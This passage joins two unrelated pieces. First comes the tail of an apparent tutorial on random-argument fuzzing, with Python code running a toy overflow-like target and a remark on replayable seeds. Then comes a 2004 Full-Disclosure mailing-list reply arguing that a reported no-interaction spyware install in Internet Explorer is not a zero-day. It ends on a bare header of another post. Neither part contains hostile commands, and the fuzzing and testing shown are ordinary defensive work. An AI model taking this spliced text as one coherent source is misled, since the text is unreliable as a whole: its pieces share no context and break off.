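    alphabet = [chr(c) for c in range(0x21, 0x7F)]
    results = []
    for _ in range(rounds):
        n = rng.randint(1, max_len)
        results.append(run_case(cmd, "".join(rng.choice(alphabet) for _ in range(n))))
    return results


def summarize(results):
    """Count outcomes by kind, the table Miller's papers report."""
    counts = {"ok": 0, "error": 0, "crash": 0, "hang": 0}
    for r in results:
        counts[r.kind] += 1
    return counts


# Constructed stand-in target (hypothetical, not any real system binary): a
# script that "copies" argv[1] into a 64-byte buffer and aborts when the
# argument is longer than the buffer, mimicking an unchecked copy.
TOY_TARGET_SRC = """
import os, sys
buf = bytearray(64)
arg = sys.argv[1].encode()
if len(arg) > len(buf):
    os.abort()
buf[:len(arg)] = arg
"""
TOY_TARGET = [sys.executable, "-c", TOY_TARGET_SRC]


if __name__ == "__main__":
    results = fuzz(TOY_TARGET, rounds=10, max_len=200)
    for r in results:
        print(f"len={r.arg_len:4d}  {r.kind:5s}  {r.detail}")
    print(summarize(results))
```

Because the seed is recorded, a run that reports a crash can be replayed with the same argument, which is what turns a random test into a bug report a vendor can act on; the timeout is what distinguishes a hang from a slow program.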



 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Alla Bezroutchko (allascanit.be)
Date: Tue Oct 05 2004 - 06:00:41 CDT


Carr, Robert wrote:
> Interesting...
>
> I just went there, and he's right. Atpartners.cab installed without
> permission. My McAfee picked it right up as Atpartners.dll, downloaded
> to Temp Internet files. Spyware detected as NetPals. On the other hand,
> I'm admin of my machine, I wonder if a "user" would get an error message
> about not having the correct rights...

I have tested it on Windows XP SP2 and on fully patched Windows 2000. In
both cases _nothing_ gets run or installed. Both systems are more or
less standard installations without any special IE hardening (except
patches).

When I surf to the site with Windows XP "Installing components...
ATpartners.cab" briefly appears in the status bar and then the site gets
displayed. Under the normal browser bars there is a message saying "The
site might require the following ActiveX control: FREE on-line games and
special offers from... Click here to install...". I don't click on it.
Searching the disk for atpartners.cab or atpartners.dll finds nothing.
The CLSID of the ActiveX control only appears in the registry in
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\".

With Windows 2000 I also get "Installing components... ATpartners.cab"
in the status bar and then the dialog box asking if I want to install
"Free online games from ATgames.com". This is a usual dialog box you get
when a page attempts to install an ActiveX control. If I click "No",
nothing gets installed, no atpartners files on the file system, no
traces of the CLSID in the registry.

I suppose the cab file gets downloaded so that Windows can read and
display the signature of the file. It does not get run or installed
unless explicitly permitted by user.

So, as far as I can see this is no 0-day.

Alla.



 
[Full-Disclosure] Re: Hi

From: Scheidell (scheidellsecnap.net)
Date: Tue Oct 05 2004 - 08:39:10 CDT